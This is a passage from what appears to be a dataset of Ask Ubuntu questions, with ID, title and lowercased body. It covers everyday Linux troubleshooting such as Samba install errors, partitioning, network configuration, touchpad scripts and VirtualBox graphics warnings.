find/install a .deb package of filmgimp or glasgow or similar programs that will work on ubuntu ... thanks for your time
311058	how to access the windows 7 shared folders	i 'm a little new to ubuntu , but i 'm lovin ' it so far : ) i have ubuntu 12.04 installed om my older desktop and connected with a wire . my ( newer ) laptop has windows 7 running and has all my music . i 'd like to access the music and play it on the desktop . this should be possible since it 's a shared folder in windows 7 , but i have no clue how to access these files from my linux machine .
311060	blank menu bar in lxde	as depicted above , i have a blank menu bar in my lxde desktop environment . i am running this desktop with regular ubuntu 13.04 . i have tried re-installing lxde : sudo apt-get install -- reinstall lubuntu-desktop this has not fixed it however . does any one have ideas on what is going on here ?
311063	how to open this dropbox file in ubuntu 12.04 ?	as what title said , how should i open this file ? it was a executable ( application/x-executable ) file . thank you .
311066	installing java on lubuntu 13.04	the name says it . i checked other sources , but ca n't really figure it out . i want to run java games .
311071	why is python so slow on raring ?	in order to run a few benchmarks on my newly installed 13.04 , i wrote the below fibonacci script in python . it basically accepts a number and starts crunching fibonacci numbers that many times : # ! /usr/bin/python import time from time import time def fibo ( n ) : a , b , i=0,1,0 while i < n : # print b a , b = b , b+a i+=1 if __name__ == `` __main__ '' : s=time ( ) fibo ( 1000000 ) print round ( ( time ( ) -s ) *1000,0 ) , '' ms '' however , when the fibo ( ) function is called with 1 million as parameter , the python seems to hang . while , this similar code in java runs instantly : class fibonacci { private static void fibo ( int n ) { int a=0 , b=1 , i=0 ; while ( i < n ) { //print b int t=a ; a=b ; b=b+t ; i++ ; } } public static void main ( string [ ] args ) { float s=system.currenttimemillis ( ) ; fibo ( 1000000 ) ; system.out.println ( ( system.currenttimemillis ( ) -s ) + `` ms '' ) ; } } what is the reason for this ? is python inherently that slow or is something wrong with my raring installation ?
311072	problem with samba	i recently installed samba and the computer gave an error message saying that samba could not be installed ... after that the same error message came for anything that i installed ... pl . help i 'm very new to ubuntu ... the error message when itried it again sudo apt-get install samba smbfs [ sudo ] password for simon : reading package lists ... done building dependency tree reading state information ... done samba is already the newest version . the following extra packages will be installed : cifs-utils keyutils suggested packages : winbind the following new packages will be installed : cifs-utils keyutils smbfs 0 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 103 kb of archives . after this operation , 360 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //lk.archive.ubuntu.com/ubuntu/ precise-updates/main cifs-utils i386 2:5.1-1ubuntu2 [ 65.2 kb ] get:2 htp : //lk.archive.ubuntu.com/ubuntu/ precise/main keyutils i386 1.5.2-2 [ 34.1 kb ] get:3 htp : //lk.archive.ubuntu.com/ubuntu/ precise-updates/main smbfs i386 2:5.1-1ubuntu2 [ 3,264 b ] fetched 103 kb in 2s ( 45.0 kb/s ) selecting previously unselected package cifs-utils . ( reading database ... 236601 files and directories currently installed . ) unpacking cifs-utils ( from ... /cifs-utils_2 % 3a5.1-1ubuntu2_i386.deb ) ... selecting previously unselected package keyutils . unpacking keyutils ( from ... /keyutils_1.5.2-2_i386.deb ) ... selecting previously unselected package smbfs . unpacking smbfs ( from ... /smbfs_2 % 3a5.1-1ubuntu2_i386.deb ) ... processing triggers for man-db ... setting up samba4 ( 4.0.0~alpha18.dfsg1-4ubuntu2 ) ... unknown parameter encountered : `` remote announce '' ignoring unknown parameter `` remote announce '' unknown parameter encountered : `` remote browse sync '' ignoring unknown parameter `` remote browse sync '' unknown parameter encountered : `` printcap name '' ignoring unknown parameter `` printcap name '' unknown parameter encountered : `` load printers '' ignoring unknown parameter `` load printers '' unknown parameter encountered : `` cups options '' ignoring unknown parameter `` cups options '' unknown parameter encountered : `` printing '' ignoring unknown parameter `` printing '' unknown parameter encountered : `` guest account '' ignoring unknown parameter `` guest account '' unknown parameter encountered : `` max log size '' ignoring unknown parameter `` max log size '' unknown parameter encountered : `` username level '' ignoring unknown parameter `` username level '' unknown parameter encountered : `` unix password sync '' ignoring unknown parameter `` unix password sync '' unknown parameter encountered : `` os level '' ignoring unknown parameter `` os level '' unknown parameter encountered : `` logon drive '' ignoring unknown parameter `` logon drive '' unknown parameter encountered : `` logon home '' ignoring unknown parameter `` logon home '' unknown parameter encountered : `` logon path '' ignoring unknown parameter `` logon path '' unknown parameter encountered : `` logon script '' ignoring unknown parameter `` logon script '' unknown parameter encountered : `` wins proxy '' ignoring unknown parameter `` wins proxy '' unknown parameter encountered : `` preserve case '' ignoring unknown parameter `` preserve case '' unknown parameter encountered : `` short preserve case '' ignoring unknown parameter `` short preserve case '' unknown parameter encountered : `` client use spnego '' ignoring unknown parameter `` client use spnego '' unknown parameter encountered : `` client schannel '' ignoring unknown parameter `` client schannel '' unknown parameter encountered : `` server schannel '' ignoring unknown parameter `` server schannel '' unknown parameter encountered : `` nt pipe support '' ignoring unknown parameter `` nt pipe support '' unknown parameter encountered : `` allow trusted domains '' ignoring unknown parameter `` allow trusted domains '' unknown parameter encountered : `` enable spoolss '' ignoring unknown parameter `` enable spoolss '' unknown parameter encountered : `` follow symlinks '' ignoring unknown parameter `` follow symlinks '' unknown parameter encountered : `` update encrypted '' ignoring unknown parameter `` update encrypted '' unknown parameter encountered : `` pam password change '' ignoring unknown parameter `` pam password change '' unknown parameter encountered : `` passwd chat timeout '' ignoring unknown parameter `` passwd chat timeout '' unknown parameter encountered : `` hostname lookups '' ignoring unknown parameter `` hostname lookups '' unknown parameter encountered : `` username map '' ignoring unknown parameter `` username map '' unknown parameter encountered : `` passwd program '' ignoring unknown parameter `` passwd program '' unknown parameter encountered : `` add user script '' ignoring unknown parameter `` add user script '' unknown parameter encountered : `` add user to group script '' ignoring unknown parameter `` add user to group script '' unknown parameter encountered : `` add group script '' ignoring unknown parameter `` add group script '' unknown parameter encountered : `` delete user script '' ignoring unknown parameter `` delete user script '' unknown parameter encountered : `` delete user from group script '' ignoring unknown parameter `` delete user from group script '' unknown parameter encountered : `` delete group script '' ignoring unknown parameter `` delete group script '' unknown parameter encountered : `` add machine script '' ignoring unknown parameter `` add machine script '' unknown parameter encountered : `` machine password timeout '' ignoring unknown parameter `` machine password timeout '' unknown parameter encountered : `` idmap uid '' ignoring unknown parameter `` idmap uid '' unknown parameter encountered : `` idmap gid '' ignoring unknown parameter `` idmap gid '' unknown parameter encountered : `` winbind use default domain '' ignoring unknown parameter `` winbind use default domain '' unknown parameter encountered : `` winbind cache time '' ignoring unknown parameter `` winbind cache time '' unknown parameter encountered : `` winbind trusted domains only '' ignoring unknown parameter `` winbind trusted domains only '' unknown parameter encountered : `` winbind nested groups '' ignoring unknown parameter `` winbind nested groups '' unknown parameter encountered : `` winbind nss info '' ignoring unknown parameter `` winbind nss info '' unknown parameter encountered : `` winbind refresh tickets '' ignoring unknown parameter `` winbind refresh tickets '' unknown parameter encountered : `` winbind offline logon '' ignoring unknown parameter `` winbind offline logon '' unknown parameter encountered : `` valid users '' ignoring unknown parameter `` valid users '' unknown parameter encountered : `` writable '' ignoring unknown parameter `` writable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` public '' ignoring unknown parameter `` public '' unknown parameter encountered : `` locking '' ignoring unknown parameter `` locking '' unknown parameter encountered : `` writable '' ignoring unknown parameter `` writable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` public '' ignoring unknown parameter `` public '' unknown parameter encountered : `` locking '' ignoring unknown parameter `` locking '' unknown parameter encountered : `` writable '' ignoring unknown parameter `` writable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` public '' ignoring unknown parameter `` public '' unknown parameter encountered : `` create mode '' ignoring unknown parameter `` create mode '' unknown parameter encountered : `` locking '' ignoring unknown parameter `` locking '' unknown parameter encountered : `` writable '' ignoring unknown parameter `` writable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` public '' ignoring unknown parameter `` public '' unknown parameter encountered : `` locking '' ignoring unknown parameter `` locking '' unknown parameter encountered : `` admin users '' ignoring unknown parameter `` admin users '' unknown parameter encountered : `` writeable '' ignoring unknown parameter `` writeable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` locking '' ignoring unknown parameter `` locking '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` use client driver '' ignoring unknown parameter `` use client driver '' unknown parameter encountered : `` printing '' ignoring unknown parameter `` printing '' unknown parameter encountered : `` print command '' ignoring unknown parameter `` print command '' unknown parameter encountered : `` lpq command '' ignoring unknown parameter `` lpq command '' unknown parameter encountered : `` lprm command '' ignoring unknown parameter `` lprm command '' unknown parameter encountered : `` remote announce '' ignoring unknown parameter `` remote announce '' unknown parameter encountered : `` remote browse sync '' ignoring unknown parameter `` remote browse sync '' unknown parameter encountered : `` printcap name '' ignoring unknown parameter `` printcap name '' unknown parameter encountered : `` load printers '' ignoring unknown parameter `` load printers '' unknown parameter encountered : `` cups options '' ignoring unknown parameter `` cups options '' unknown parameter encountered : `` printing '' ignoring unknown parameter `` printing '' unknown parameter encountered : `` guest account '' ignoring unknown parameter `` guest account '' unknown parameter encountered : `` max log size '' ignoring unknown parameter `` max log size '' unknown parameter encountered : `` username level '' ignoring unknown parameter `` username level '' unknown parameter encountered : `` unix password sync '' ignoring unknown parameter `` unix password sync '' unknown parameter encountered : `` os level '' ignoring unknown parameter `` os level '' unknown parameter encountered : `` logon drive '' ignoring unknown parameter `` logon drive '' unknown parameter encountered : `` logon home '' ignoring unknown parameter `` logon home '' unknown parameter encountered : `` logon path '' ignoring unknown parameter `` logon path '' unknown parameter encountered : `` logon script '' ignoring unknown parameter `` logon script '' unknown parameter encountered : `` wins proxy '' ignoring unknown parameter `` wins proxy '' unknown parameter encountered : `` preserve case '' ignoring unknown parameter `` preserve case '' unknown parameter encountered : `` short preserve case '' ignoring unknown parameter `` short preserve case '' unknown parameter encountered : `` client use spnego '' ignoring unknown parameter `` client use spnego '' unknown parameter encountered : `` client schannel '' ignoring unknown parameter `` client schannel '' unknown parameter encountered : `` server schannel '' ignoring unknown parameter `` server schannel '' unknown parameter encountered : `` nt pipe support '' ignoring unknown parameter `` nt pipe support '' unknown parameter encountered : `` allow trusted domains '' ignoring unknown parameter `` allow trusted domains '' unknown parameter encountered : `` enable spoolss '' ignoring unknown parameter `` enable spoolss '' unknown parameter encountered : `` follow symlinks '' ignoring unknown parameter `` follow symlinks '' unknown parameter encountered : `` update encrypted '' ignoring unknown parameter `` update encrypted '' unknown parameter encountered : `` pam password change '' ignoring unknown parameter `` pam password change '' unknown parameter encountered : `` passwd chat timeout '' ignoring unknown parameter `` passwd chat timeout '' unknown parameter encountered : `` hostname lookups '' ignoring unknown parameter `` hostname lookups '' unknown parameter encountered : `` username map '' ignoring unknown parameter `` username map '' unknown parameter encountered : `` passwd program '' ignoring unknown parameter `` passwd program '' unknown parameter encountered : `` add user script '' ignoring unknown parameter `` add user script '' unknown parameter encountered : `` add user to group script '' ignoring unknown parameter `` add user to group script '' unknown parameter encountered : `` add group script '' ignoring unknown parameter `` add group script '' unknown parameter encountered : `` delete user script '' ignoring unknown parameter `` delete user script '' unknown parameter encountered : `` delete user from group script '' ignoring unknown parameter `` delete user from group script '' unknown parameter encountered : `` delete group script '' ignoring unknown parameter `` delete group script '' unknown parameter encountered : `` add machine script '' ignoring unknown parameter `` add machine script '' unknown parameter encountered : `` machine password timeout '' ignoring unknown parameter `` machine password timeout '' unknown parameter encountered : `` idmap uid '' ignoring unknown parameter `` idmap uid '' unknown parameter encountered : `` idmap gid '' ignoring unknown parameter `` idmap gid '' unknown parameter encountered : `` winbind use default domain '' ignoring unknown parameter `` winbind use default domain '' unknown parameter encountered : `` winbind cache time '' ignoring unknown parameter `` winbind cache time '' unknown parameter encountered : `` winbind trusted domains only '' ignoring unknown parameter `` winbind trusted domains only '' unknown parameter encountered : `` winbind nested groups '' ignoring unknown parameter `` winbind nested groups '' unknown parameter encountered : `` winbind nss info '' ignoring unknown parameter `` winbind nss info '' unknown parameter encountered : `` winbind refresh tickets '' ignoring unknown parameter `` winbind refresh tickets '' unknown parameter encountered : `` winbind offline logon '' ignoring unknown parameter `` winbind offline logon '' unknown parameter encountered : `` valid users '' ignoring unknown parameter `` valid users '' unknown parameter encountered : `` writable '' ignoring unknown parameter `` writable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` public '' ignoring unknown parameter `` public '' unknown parameter encountered : `` locking '' ignoring unknown parameter `` locking '' unknown parameter encountered : `` writable '' ignoring unknown parameter `` writable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` public '' ignoring unknown parameter `` public '' unknown parameter encountered : `` locking '' ignoring unknown parameter `` locking '' unknown parameter encountered : `` writable '' ignoring unknown parameter `` writable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` public '' ignoring unknown parameter `` public '' unknown parameter encountered : `` create mode '' ignoring unknown parameter `` create mode '' unknown parameter encountered : `` locking '' ignoring unknown parameter `` locking '' unknown parameter encountered : `` writable '' ignoring unknown parameter `` writable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` public '' ignoring unknown parameter `` public '' unknown parameter encountered : `` locking '' ignoring unknown parameter `` locking '' unknown parameter encountered : `` admin users '' ignoring unknown parameter `` admin users '' unknown parameter encountered : `` writeable '' ignoring unknown parameter `` writeable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` locking '' ignoring unknown parameter `` locking '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` use client driver '' ignoring unknown parameter `` use client driver '' unknown parameter encountered : `` printing '' ignoring unknown parameter `` printing '' unknown parameter encountered : `` print command '' ignoring unknown parameter `` print command '' unknown parameter encountered : `` lpq command '' ignoring unknown parameter `` lpq command '' unknown parameter encountered : `` lprm command '' ignoring unknown parameter `` lprm command '' /var/lib/dpkg/info/samba4.postinst : 14 : /var/lib/dpkg/info/samba4.postinst : /usr/share/samba/setoption.pl : permission denied dpkg : error processing samba4 ( -- configure ) : subprocess installed post-installation script returned error exit status 126 setting up cifs-utils ( 2:5.1-1ubuntu2 ) ... setting up keyutils ( 1.5.2-2 ) ... setting up smbfs ( 2:5.1-1ubuntu2 ) ... errors were encountered while processing : samba4 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
311073	build ubuntu vm using mirror	in kvm , using virt-install i can create centos images using this parameter in my virt install command . -l http : //mirror.umd.edu/centos/6/os/x86_64/ starting install ... retrieving file .treeinfo ... | 798 b 00:00 ... retrieving file vmlinuz ... | 7.7 mb 00:00 ... retrieving file initrd.img ... | 62 mb 00:07 ... files get fetched from the mirror , kvm builds and installs the vm using my specifications . i 'd like to know the equivalent of that mirror in ubuntu ? here are few mirrors i digged out but i ca n't find a working one with this path , curling through the mirrors , i 'm not finding treeinfo , vmlinuz , initrd.img files . http : //mirror.uoregon.edu/ubuntu/dists/maverick/main/installer-amd64/ http : //ftp.ubuntu.com/ubuntu/dists/maverick/main/installer-i386/ any pointers ?
311075	adobe reader re-installation error	i 've installed adobe reader from bin file cd `` to directory '' sudo `` bin file '' it was working but i 've decided to add repos of acroread so i uninstalled reader dropping to terminal uninstall file localized in /opt/adobe/reader9/bin/ after typing into terminal : sudo add-apt-repository `` deb http : //archive.canonical.com/ raring partner '' sudo apt-get update sudo apt-get install acroread an error occured in /var/cache/apt/archives/acroread-bin_9.5.5-1raring1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) after that error synaptic notification appeared that some packages are broken so i edit- > repair and next error occurred : e : /var/cache/apt/archives/acroread-bin_9.5.5-1raring1_i386.deb : trying to overwrite `` /opt/adobe/reader9/bin/acroread '' , which is also in package adobereader-enu 9.5.5 any ideas how to fix it ?
311076	ubuntu web apps application indicator not going away	by this i 'm talking about the little mail icon in the top right corner . i accidentally allowed webapps integration for reddit but i subsequently removed reddit from the list of allowed domains gsettings set com.canonical.unity.webapps allowed-domains [ ] and i removed the following packages unity-webapps-reddit unity-webapps-common unity-webapps-service but i still have this any help would be greatly appreciated .
311080	how to set default environment variables for other users ?	i installed postgres under lubuntu 13.04 . when i try to run it : sudo -u postgres psql it gives me this error : psql : could not connect to server : no such file or directory is the server running locally and accepting connections on unix domain socket `` /var/run/postgresql/.s.pgsql.5432 '' ? i can start it changing the port : sudo -u postgres -i export pgport=5433 psql but i would to make it the default port . i tried to add export pgport=5433 to the .bashrc of postgres user , but it does n't work ; it seems that .bashrc is not executed with sudo -u , since if i do : sudo -u postgres -i . .bashrc psql it works . is there a way to make sudo -u user -i execute .bashrc , or is there another way to make the change of that environment variable permanent for postgres user ?
311082	use minix filesystem on ubuntu 13.04 ( kernel 3.8 )	how can i add minix filesystem support to ubuntu 13.04 ( raring ) with linux kernel 3.8 ? i have the minix filesystem source code from an older version of linux ( 2.0.39 ) .
311084	unable to connect to open wireless network	i am unable to connect to a wifi network . when i try to connect i can see that either the network stops broadcast or my adapter does n't recieve it . thank you .
311086	cant purge with apt-get , because of dependencies	my /boot/ sadly is full , so i cant use apt-get upgrade anymore , or similar things . if i try to purge one of the kernels , with : apt-get purge linux-image-3.2.0-29-generic i get : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-server : depends : linux-headers-server ( = 3.2.0.41.49 ) but 3.2.0.48.58 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . and nothing happens after all . i cant use apt-get -f install , since the action fails due to a full /boot/ . how can i force apt-get to delete one of the images ? thanks for the help .
311089	why is openjdk not preinstalled ?	i do n't understand why openjdk is not preinstalled . a bunch of applications depend on it and it only takes up 0,7mb . of course there is the unneeded `` openjdk policy tool '' icon but canonical could easily remove that . why has canonical chosen to not preinstall openjdk ?
311090	portable users on network	i am moving all my windows desktops to ubuntu in my office . i have a phone system which allows my users to login on any phone thus any desk they sit at is 'their desk ' i would like to do something similar with the desktop . i would like them to be able to login on any workstation and that becomes their desk . i would assume it would load their home folder from the server somehow ?
311102	after changing network properties , ubuntu does n't finish booting	i changed my network /etc/network/interfaces settings to have a static ip but when i rebooted after that it did n't finish booting up . it goes up to roundabout *starting apparmor profiles [ ok ] and then stops and does n't continue . it also does : *configuring virtual network devices [ fail ] i have access to the grub boot menu and from there i have access to the root command shell . in the /etc/network/interfaces is written : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auth eth0 address 192.168.1.101 netmask 255.255.255.0 gateway 192.168.1.135 dns nameserver 192.168.1.135 4.4.4.4 i thank everyone in advance
311104	downloading updates	when i click install up dates from the update manager i receive the following error message : '' cd/dvd unbuntu 12.10_quantal quetz_-release 1386 ( 20121017.2 ) required '' i can not find this item to burn a disc .
311105	add unallocated space to ubuntu	i have a win7 installed . for ubuntu , i shrink my hard disk and free 80g for ubuntu installation . then i installed ubuntu alongside win7 using the free 60g space , and leave another 20g free unallocated . after installation . i want to allocate the 20g to ubuntu . how can i do it ? following is my system information : device boot start end blocks id system /dev/sda1 63 80324 40131 de dell utility partition 1 does not start on physical sector boundary . /dev/sda2 * 81920 25563135 12740608 7 hpfs/ntfs/exfat /dev/sda3 25563136 513466367 243951616 7 hpfs/ntfs/exfat /dev/sda4 513468414 930506751 208519169 f w95 ext 'd ( lba ) partition 4 does not start on physical sector boundary . /dev/sda5 513468416 812931071 149731328 7 hpfs/ntfs/exfat /dev/sda6 812933120 813322239 194560 83 linux /dev/sda7 813324288 852383743 19529728 83 linux /dev/sda8 852385792 891445247 19529728 83 linux /dev/sda9 891447296 930506751 19529728 83 linux the 20g free space is after /dev/sda9 . how can i add 20g to sda4 extended .
311106	moving to linux	the family pc is riding off into the sun . i want to replace it with a linux solution . i 'm looking at ubuntu and opensuse . i want to end up with a solution where anyone in my family can access their files securely from a remote location ( laptop , desktop , ios device , android device , ... . ) . we also use google for docs , calendar , sites , drive , basically everything so i need compatibility there also . i 'm willing to invest the time to move from windows and really learn a new os so i want to know if ... 1 . ubuntu will meet my families growing needs ? 2 . if so , should the solution i 'm looking for be housed in one machine or should i build multiple ?
311107	how to switch between nautilus window and ( gnome- ) terminal	i need a fast possibility to switch between a nautilus window and a ( gnome-terminal ) in the same working directory . at the moment i 'm using the following setup : nautilus - > terminal : nautilus-open-terminal ( rightclick > open terminal here ) & close nautilus window manually terminal - > nautilus : alias explorer= '' nautilus $ ( pwd ) & & exit '' my problem is , that on the one hand [ nautilus - > terminal ] takes some time ( rightclick..manual close.. ) : i 'd like to have a hotkey or something more direct for this operation . and on the other hand [ terminal - > nautilus ] does only work when there is already a nautilus instance running somewhere , otherwise the terminal blocks running nautilus and does n't close itself . as i 'm using a tiling window manager ( xmonad ) i do n't want both windows to be running at the same time . any ideas ?
311109	opengl warnings with ubuntu 12.04 lts running as a virtualbox guest under windows7	i have been using 12.04 as a guest on my laptop for quiet some time now and it works flawlessly . today a colleague asked me about the 3d performance of the guest . it never came in my mind to use fancy 3d stuff on the guest , but i was interested in the results anyway , so i enabled the 3d acceleration in the virtualbox menu for my installation and rebooted the vm . running glxgears gives strange warnings , plus the window with the rotating gears stays black ( i posted the console output below ) . running glxgears without the 3d acceleration enabled works , i end up with ~570 fps and no warnings . the low fps are not my issue here , but the black glxgears window is strange . my guess is that there is some issue with the nvidia driver of the host system ? ( looking at the nv suffix of the warnings ) ortang @ vbox-12-04 : ~ $ glxgears opengl warning : glflushvertexarrayrangenv not found in mesa table opengl warning : glvertexarrayrangenv not found in mesa table opengl warning : glcombinerinputnv not found in mesa table opengl warning : glcombineroutputnv not found in mesa table opengl warning : glcombinerparameterfnv not found in mesa table opengl warning : glcombinerparameterfvnv not found in mesa table opengl warning : glcombinerparameterinv not found in mesa table opengl warning : glcombinerparameterivnv not found in mesa table opengl warning : glfinalcombinerinputnv not found in mesa table opengl warning : glgetcombinerinputparameterfvnv not found in mesa table opengl warning : glgetcombinerinputparameterivnv not found in mesa table opengl warning : glgetcombineroutputparameterfvnv not found in mesa table opengl warning : glgetcombineroutputparameterivnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterfvnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterivnv not found in mesa table opengl warning : gldeletefencesnv not found in mesa table opengl warning : glfinishfencenv not found in mesa table opengl warning : glgenfencesnv not found in mesa table opengl warning : glgetfenceivnv not found in mesa table opengl warning : glisfencenv not found in mesa table opengl warning : glsetfencenv not found in mesa table opengl warning : gltestfencenv not found in mesa table 369 frames in 5.0 seconds = 73.647 fps the host is a windows 7 ( 64bit ) dell laptop ( precision e4600 ) with a i7-2820qm cpu and a nvidia quadro 2000m ( driver version 311.10 ) graphics card . the guest is an up to date 12.04 lts install , with installed guest addons . some additional information , running the unity support test tool : ortang @ vbox-12-04 : ~ $ /usr/lib/nux/unity_support_test -p opengl warning : glflushvertexarrayrangenv not found in mesa table opengl warning : glvertexarrayrangenv not found in mesa table opengl warning : glcombinerinputnv not found in mesa table opengl warning : glcombineroutputnv not found in mesa table opengl warning : glcombinerparameterfnv not found in mesa table opengl warning : glcombinerparameterfvnv not found in mesa table opengl warning : glcombinerparameterinv not found in mesa table opengl warning : glcombinerparameterivnv not found in mesa table opengl warning : glfinalcombinerinputnv not found in mesa table opengl warning : glgetcombinerinputparameterfvnv not found in mesa table opengl warning : glgetcombinerinputparameterivnv not found in mesa table opengl warning : glgetcombineroutputparameterfvnv not found in mesa table opengl warning : glgetcombineroutputparameterivnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterfvnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterivnv not found in mesa table opengl warning : gldeletefencesnv not found in mesa table opengl warning : glfinishfencenv not found in mesa table opengl warning : glgenfencesnv not found in mesa table opengl warning : glgetfenceivnv not found in mesa table opengl warning : glisfencenv not found in mesa table opengl warning : glsetfencenv not found in mesa table opengl warning : gltestfencenv not found in mesa table opengl vendor string : humper opengl renderer string : chromium opengl version string : 2.1 chromium 1.9 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes the gui runs smooth , however i have not activated any fancy stuff ( all default ) . i have found some links where they report that the 3d acceleration works fine on a 12.04 guest , they even run games there with no major performance loss . i found a similar post on stackoverflow but that was closed as off topic : http : //stackoverflow.com/questions/16287511/opengl-warnings-after-enabling-3d-acceleration-in-virtual-box-running-ubuntu-12 any hints to solve that problem would be nice !
311112	search lan in resolv.conf	on 12.04 server , i have static nic config , but i want to remove lan from the dns search path , or resolv.conf . this is auto-generated as we know . i do n't want it to search anything , except for what i tell it in the interfaces file . why does it include .lan in the search path ? mind boggling . $ cat /etc/resolv.conf nameserver 8.8.8.8 nameserver 8.8.4.4 search lan local above , i only want `` search local '' ( or nothing even ! ) below , i tried to specify local , in the hope that lan would go away . not so . $ cat /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.0.2.28 netmask 255.255.255.0 gateway 10.0.2.2 dns-nameservers 8.8.8.8 8.8.4.4 dns-domain local dns-search local auto eth1 iface eth1 inet static address 10.0.0.28 netmask 255.255.255.0 dns-nameservers 8.8.8.8 8.8.4.4 dns-domain local dns-search local
311114	ubuntu 13.04 install stuck in partitioning	i 'm running a new system with 120gb ssd and 2tb hdd . i 've started by installing windows 8 , i 've created a 75gb partition on the ssd for the windows and installed it . on the hdd , i 've created an ntfs partition , that taked all the place . i 've created a bootable usb and started installing ubuntu 13.04 . when he asked me where to install i chose 'something else ' and reached the partitioning screen . i choose the free space from sda1 ( ssd ) and created a partition as 'primary ' , ext4 , mounting point '/ ' and 22000 mb . with the rest of the space i 've created the same type of partition but chose '/home ' instead . after that i double clicked the ntfs from sdb1 and chose 16000mb as swap area . then i chose 'install now ' . this is running for almost 45min and did n't stop . i have i7-4770k , a really good cpu . should it take so much time ? i 'm starting to get worry . i do n't want to restart the computer . any help will be appreciated , thanks
311117	trackpad script not working on startup / login	the issue at hand my aim is to enable natural scrolling on system start ( or session start ) , which - up until now - could be easily achieved using a startup script , but since migrating from 12.04 ( 32 bit ) to 13.04 ( 64 bit ) i 'm not able to automate this task . here 's the script used : # ! /bin/sh xinput set-prop 12 273 -25 -25 it works when running independently , so it seem to be overridden by a later call . how to resolve this ? what have i tried ? adding an entry in the startup applications for the trackpad script using a @ reboot flagged entry in crontab to call the xinput command calling the trackpad script in .bash_login , or in .profile adding a .conf file in /etc/init i think at some point i even tried to mess around with sequencing directories and sequencing file names under /etc/rc* including a call in various scripts under /etc/pm ( that actually got things working for the boot phase , but any subsequent suspend/sleep would deactivate the trackpad custom settings , again ) . environment dell xps 13 , ubuntu 13.04 64 bit .
311119	ubuntu 12.04 hangs during plymouth purple screen boot	i am running ubuntu 12.04 lts on a partition on ( i believe ) an apple mac mini `` core i5 '' . everything was going well until recently . now ubuntu hangs during the purple splash screen , just showing endless cycling dots . i have been able to successfully boot in text only mode by changing the grub boot command from `` quiet splash '' to `` text '' , and launched lightdm from the command line , but this is really not what i want to do every time i start up . i 've looked at a lot of similar questions and tried the solutions there , such as trying to reconfigure xserver-xorg and setting grub to `` nomodeset '' , but none of them worked . i would be willing to retry any of those solutions at the direction of answerers who think they know what to do to fix it . a fun complication to all of this is that the mac mini does n't have an optical drive and so i ca n't use a livecd , and requires an intense and painful process to create a mac liveusb , so that is a solution of last resort .
311128	code blocks is using 100 % of cpu	i 'm using code blocks 10.05 on ubuntu 12.04 and it 's using 100 % of the cpu with no project or files open .
311129	can i configure my synaptic touchpad to disable/enable with a triple click as it does in windows ?	in windows , i can triple click the upper-left corner of my touchpad to enable/disable . i downloaded a little guy that enables/disables it , but i have to click on it and select enable/disable in the status bar at the top ( do n't know if the menu next to the clock is known as the status bar , but that 's what i 'm calling it ) , but i want to be able to enable/disable more quickly . possible ?
311130	what does `` sudo apt-get install aptitude '' do ?	i am completely new to linux and hence ubuntu . though i have been using the ubuntu os on my system for a while , it is for the first time i am trying to learn the nuances and hence starting with the documentation . i am wondering , if we use apt-get command to install packages , what does apt-get install aptitude do ?
311131	how can i prevent the alt-tab shortcut from nesting terminal windows ?	i like to have multiple terminal windows open sometimes , however when i use alt-tab it nests all instances of the same application in one icon and then you must wait a second for it to let you tab through those instances . is there a way that i can just have it treat the multiple terminal windows like separate applications so i can switch through faster ? thanks !
311133	sign in in a website using the terminal	i 'm trying to sign in in a website using this command : wget -- save-cookies cookies.txt -- keep-session-cookies -- post-data 'login_email=aaaaaaa & login_password=123456 ' http : //aaaaa.com/index.php but it does n't work . is there another command to sign in in a website automatically ? thank you a lot for answering me
311135	print contents of a directory structure ( filesystem ) to csv on the command line	how can i catalog the contents of a filesystem to a csv file ? this is particularly useful for removable media . i 've found a couple links that point in this direction : askubuntu.com : listing files in a directory without listing subdirectories and their contents in that directory hints.macworld.com : create a directory list in csv format thank you !
311142	port forward in terminal only	i have an old ubuntu server ( 13.04 ) , and want to open a port for this online game server style software for a mate . i need a port open , and to tell it that port ( i know how to tell the game that port ) . for the sake of argument , let the port i want to open be 12345 . how do i do such , with no access to a gui , only a bash shell . both how to open the port , and how to fiddle with the firewall so that port is visible to the world . thanks ! edit : i can port forward it internally ( iptables esque ) , but i do n't know what firewalling software i have installed . is there an easy way to find that out ? also , how do i port forward the router as well , all from the terminal . sorry for the earlier lack of detail
311149	mac book air runnign mac os , windows8 , and ubuntu	i hear of people installing ubuntu side by side with mac os but i must have windows 8 too for my work . is it possible to boot all three os 's in a mac book air ? thanks !
